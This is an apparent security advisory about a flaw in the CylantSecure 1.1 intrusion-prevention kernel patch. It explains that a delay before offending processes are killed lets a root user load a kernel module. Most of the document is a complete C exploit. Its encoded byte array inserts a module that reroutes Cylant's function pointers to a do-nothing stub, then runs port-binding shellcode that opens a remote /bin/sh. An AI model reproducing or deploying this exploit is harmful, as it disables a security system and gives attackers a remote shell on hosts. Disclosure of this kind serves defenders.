COMMAND

    CylantSecure

SYSTEMS AFFECTED

    CylantSecure

PROBLEM

    Juergen Pabel  found following.   CylantSecure is  a kernel  patch
    and system that analyses behavior and kills programs that deviates
    from the "normal" system behaviour.  The vulnerability lies in the
    processessing delay that occurs  between a process violating  some
    security rule and the actual killing of the process (a user  space
    analyser).  By inserting a module (which in itself is a violation,
    but due to the mentioned delay it suceeds) that reroutes  function
    pointers the system can effectively be disabled.

    The vulnerability exists in CylantSecure 1.1 and earlier.

    Following is an exploit to disable the cylant system.  It needs to
    be run as root.  It simply inserts a kernel module which re-routes
    some function pointers  to point to  a function that  does nothing
    (contained in my module code).   By doing this the cylant  defense
    system  is  effectively  disabled.   This  code uses hardcoded (!)
    values for the pointer addresses, which you will need to adapt  if
    you want to use it on any other build then the build that was used
    for their hacking challenge (kernel 2.2.18, cylant version 1.1).

    /*
    Juergen Pabel
    juergen@pabel.net
    
    
    a short outline of this code:
    
    - demasq's the rest of the packet (each byte after the initial code (64bytes) is decreased
      by 3...there was no 0xfd in the packet)
    - insert the module into the kernel
      - the module's init function reroutes the function pointers to the function stub in the
        module code
    - bind a shell to a tcp port (i'll leave it to you to figure out which one...take it as a
      script kiddie protection, even though i doubt this will find any real use...it's more of a
      proof of concept)
    
    i want to congratulate all the (very nice and helpful) people at cylant for a fine
    product (they were already working on a fix to this particular attack, so this attack
    probably won't work in newer versions of cylant's software). greetings go to spender,
    oasis, my rugby buddy: destructive force
    
    credits go to ron1n for writting the port binding shell code, which i ripped from
    his statdx exploit.
    
    i take no responsibility for what you do with this...
    
    */
    
    int main (int argc, char* argv[])
    {
    char moduleloader[] = {
    //masq'ing ascii 0 (size = 64 bytes)
    //takes the next 448 bytes and decreases each byte by 3 (ascii \0 avoidance)
    0x31, 0xc9, 0xe3, 0x02, 0xe3, 0x05, 0xe8, 0xf9, 0xff, 0xff, 0xff, 0x58,
    0x83, 0xe8, 0x0b, 0x89, 0xc6, 0x31, 0xc9, 0x41, 0xd0, 0xe1, 0xd0, 0xe1,
    0xd0, 0xe1, 0xd0, 0xe1, 0xd0, 0xe1, 0xd0, 0xe1, 0x01, 0xce, 0x66, 0xb9,
    0xc0, 0x01, 0xfe, 0x0e, 0xfe, 0x0e, 0xfe, 0x0e, 0x46, 0x49, 0xe3, 0x05,
    0xe9, 0xf1, 0xff, 0xff, 0xff, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90,
    
    //module loader, jumps to code at end after module loading (size = 84)
    0xe8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x83, 0xeb, 0x05, 0xb8, 0x7f, 0x00,
    0x00, 0x00, 0x81, 0xc3, 0x60, 0x00, 0x00, 0x00, 0x83, 0xc3, 0x48, 0xb9,
    0x00, 0x01, 0x00, 0x00, 0xcd, 0x80, 0x89, 0xc2, 0x83, 0xeb, 0x48, 0xc7,
    0x43, 0x00, 0x48, 0x00, 0x00, 0x00, 0xc7, 0x43, 0x0c, 0x00, 0x01, 0x00,
    0x00, 0x83, 0xc2, 0x48, 0x89, 0x53, 0x08, 0x83, 0xc2, 0x08, 0x89, 0x53,
    0x2c, 0xb8, 0x80, 0x00, 0x00, 0x00, 0x83, 0xc3, 0x48, 0x89, 0xd9, 0x83,
    0xe9, 0x48, 0xcd, 0x80, 0x31, 0xc9, 0x0f, 0x83, 0xcc, 0x00, 0x00, 0x00,
    
    //padding (size = 12) : total = 160
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    
    
    
    // ---- ==== END OF MODULE LOADER, next is module code ==== ----
    
    //struct module (size = 72 bytes)
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    
    //module name : jpabel + 2 0x00's (size = 8)
    0x6a, 0x70, 0x61, 0x62, 0x65, 0x6c, 0x00, 0x00,
    
    //module content (size == 96)
        /* module init */
        0xe8, 0x00, 0x00, 0x00, 0x00,      /* calln 0      */
        0x58,                              /* pop eax      */
        0x83, 0xe8, 0x05,                  /* sub eax, 5   */
    //9
        0x89, 0xc1,                        /* mov ecx, eax */
        0x83, 0xc1, 0x60,                  /* add ecx, FUNC w/ 6 params */
    //5
        /* reroute rid_inst_ip (6 params) */
        0xba, 0x6c, 0x94, 0x25, 0xc0,      /* mov edx, PTR */
        0x89, 0x0a,                        /* mov [edx],ecx*/
    //7
        0x83, 0xc1, 0x04,                 /* add ecx, 4 (from 6 params -> 2 params) */
    //3
        /* reroute cyl_inst_pid (2 params) */
        0xba, 0x64, 0x94, 0x25, 0xc0,      /* mov edx, PTR */
        0x89, 0x0a,                        /* mov [edx],ecx*/
        /* reroute rid_inst_pid (2 params) */
        0xba, 0x70, 0x94, 0x25, 0xc0,      /* mov edx, PTR */
        0x89, 0x0a,                        /* mov [edx],ecx*/
    //14
        0x83, 0xc1, 0x01,                 /* add ecx, 1 (from 2 params -> 1 param) */
    //3
        /* reroute aria_inst_kout (1 param) */
        0xba, 0x50, 0x94, 0x25, 0xc0,      /* mov edx, PTR */
        0x89, 0x0a,                        /* mov [edx],ecx*/
        /* reroute rids_should_profile (1 param) */
        0xba, 0x5c, 0x94, 0x25, 0xc0,      /* mov edx, PTR */
        0x89, 0x0a,                        /* mov [edx],ecx*/
        /* reroute rids_pid_release_task (1 param) */
        0xba, 0x74, 0x94, 0x25, 0xc0,      /* mov edx, PTR */
        0x89, 0x0a,                        /* mov [edx],ecx*/
        /* reroute rids_pid_tag_task (1 param) */
        0xba, 0x78, 0x94, 0x25, 0xc0,      /* mov edx, PTR */
        0x89, 0x0a,                        /* mov [edx],ecx*/
        /* reroute rids_should_drop ip (1 param) */
        0xba, 0x7c, 0x94, 0x25, 0xc0,      /* mov edx, PTR */
        0x89, 0x0a,                        /* mov [edx],ecx*/
    //35
        /* leave module init function */
        0xb8, 0x00, 0x00, 0x00, 0x00,      /* mov eax, 0   */
        0xc3,                              /* ret          */
    //6
        0x90, 0x90, 0x90, 0x90, 0x90, 0x90,/* NOPs         */
        0x90, 0x90, 0x90, 0x90, 0x90, 0x90,/* NOPs         */
        0x90, 0x90,                        /* NOPs         */
    //14
    
    //cylant empty function (size == 12)
        /* placebo function (offset depends on param count) */
        0x90, 0x90, 0x90, 0x90, 0x90, 0x90,/* NOPs       */
        0xb8, 0x00, 0x00, 0x00, 0x00,      /* mov eax, 0 */
        0xc3,                              /* ret        */
    
    //padding (size == 4) for total size of 192 bytes for module
    //and 352 bytes total so far
    0x90, 0x90, 0x90, 0x90,
    
    // ------- shellcode ----------
    //size is 133
    
    
      0x31, 0xc0                              /* xorl   %eax,%eax             */
    /* jmp ricochet ------------------------------------------------------- */
    , 0xeb, 0x7c                              /* jmp    0x7c                  */
    /* kungfu: ------------------------------------------------------------ */
    , 0x59                                  /* popl   %ecx                  */
    , 0x89, 0x41, 0x10                          /* movl   %eax,0x10(%ecx)       */
    /* ------------------------------------ socket(2,1,0); ---------------- */
    , 0x89, 0x41, 0x08                          /* movl   %eax,0x8(%ecx)        */
    , 0xfe, 0xc0                              /* incb   %al                   */
    , 0x89, 0x41, 0x04                          /* movl   %eax,0x4(%ecx)        */
    , 0x89, 0xc3                              /* movl   %eax,%ebx             */
    /*, 0xfe, 0xc0*/                              /* incb   %al                   */
    ,0x40	/*incl %eax*/
    , 0x89, 0x01                              /* movl   %eax,(%ecx)           */
    , 0xb0, 0x66                              /* movb   $0x66,%al             */
    , 0xcd, 0x80                              /* int    $0x80                 */
    /* ------------------------------------ bind(sd,&sockaddr,16); -------- */
    , 0xb3, 0x02                              /* movb   $0x2,%bl              */
    , 0x89, 0x59, 0x0c                          /* movl   %ebx,0xc(%ecx)        */
    , 0xc6, 0x41, 0x0e, 0x99                      /* movb   $0x99,0xe(%ecx)       */
    , 0xc6, 0x41, 0x08, 0x10                      /* movb   $0x10,0x8(%ecx)       */
    , 0x89, 0x49, 0x04                          /* movl   %ecx,0x4(%ecx)        */
    , 0x80, 0x41, 0x04, 0x0c                      /* addb   $0xc,0x4(%ecx)        */
    , 0x88, 0x01                              /* movb   %al,(%ecx)            */
    , 0xb0, 0x66                              /* movb   $0x66,%al             */
    , 0xcd, 0x80                              /* int    $0x80                 */
    /* ------------------------------------ listen(sd,blah); -------------- */
    , 0xb3, 0x04                              /* movb   $0x4,%bl              */
    , 0xb0, 0x66                              /* movb   $0x66,%al             */
    , 0xcd, 0x80                              /* int    $0x80                 */
    /* ------------------------------------ accept(sd,0,16); -------------- */
    , 0xb3, 0x05                              /* movb   $0x5,%bl              */
    /*, 0x30, 0xc0 */                             /* xorb   %al,%al               */
    /*, 0x88, 0x41, 0x04                           movb   %al,0x4(%ecx)         */
    
    //,0x90, 0x90,
    ,0x89, 0x49, 0x04 //idea: movl %ecx, 4(%ecx)
    ,0x89, 0x49, 0x08 //idea: movl %ecx, 8(%ecx)
    
    
    , 0xb0, 0x66                              /* movb   $0x66,%al             */
    , 0xcd, 0x80                              /* int    $0x80                 */
    /* ------------------------------------ dup2(cd,0); ------------------- */
    , 0x89, 0xce                              /* movl   %ecx,%esi             */
    , 0x88, 0xc3                              /* movb   %al,%bl               */
    , 0x31, 0xc9                              /* xorl   %ecx,%ecx             */
    , 0xb0, 0x3f                              /* movb   $0x3f,%al             */
    , 0xcd, 0x80                              /* int    $0x80                 */
    /* ------------------------------------ dup2(cd,1); ------------------- */
    , 0xfe, 0xc1                              /* incb   %cl                   */
    , 0xb0, 0x3f                              /* movb   $0x3f,%al             */
    , 0xcd, 0x80                              /* int    $0x80                 */
    /* ------------------------------------ dup2(cd,2); ------------------- */
    , 0xfe, 0xc1                              /* incb   %cl                   */
    , 0xb0, 0x3f                              /* movb   $0x3f,%al             */
    , 0xcd, 0x80                              /* int    $0x80                 */
    /* ------------------------------------ execve(/bin/sh,argv,0); ----- */
    , 0xc7, 0x06, 0x2f, 0x62, 0x69, 0x6e              /* movl   $0x6e69622f,(%esi)    */
    , 0xc7, 0x46, 0x04, 0x2f, 0x73, 0x68, 0x41          /* movl   $0x4168732f,0x4(%esi) */
    , 0x30, 0xc0                              /* xorb   %al,%al               */
    , 0x88, 0x46, 0x07                          /* movb   %al,0x7(%esi)         */
    , 0x89, 0x76, 0x0c                          /* movl   %esi,0xc(%esi)        */
    , 0x8d, 0x56, 0x10                          /* leal   0x10(%esi),%edx       */
    , 0x8d, 0x4e, 0x0c                          /* leal   0xc(%esi),%ecx        */
    , 0x89, 0xf3                              /* movl   %esi,%ebx             */
    , 0xb0, 0x0b                              /* movb   $0xb,%al              */
    , 0xcd, 0x80                              /* int    $0x80                 */
    /* ------------------------------------ exit(blah); ------------------- */
    , 0xb0, 0x01                              /* movb   $0x1,%al              */
    , 0xcd, 0x80                              /* int    $0x80                 */
    /* ricochet: call kungfu ---------------------------------------------- */
    , 0xe8, 0x7f, 0xff, 0xff, 0xff,                 /* call   -0x81                 */
    
    
    //padding size=27, TOTAL = 512
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90
    };
    char* pointer;
    
    //printf("%d", sizeof(moduleloader));
    //return 0;
    
    { //masq ascii 0 bytes
    int i;
    for(i=64;i<512;i++)
	    moduleloader[i] = moduleloader[i]+3;
    }
    
    pointer = &moduleloader[0];
    asm volatile ("movl %ebp, %eax");
    asm volatile ("subl $520, %eax");
    asm volatile ("pushl %eax");
    asm volatile ("ret");
    
    return 0;
    }

SOLUTION

    The Cylant Team has been notified and is working on a fix.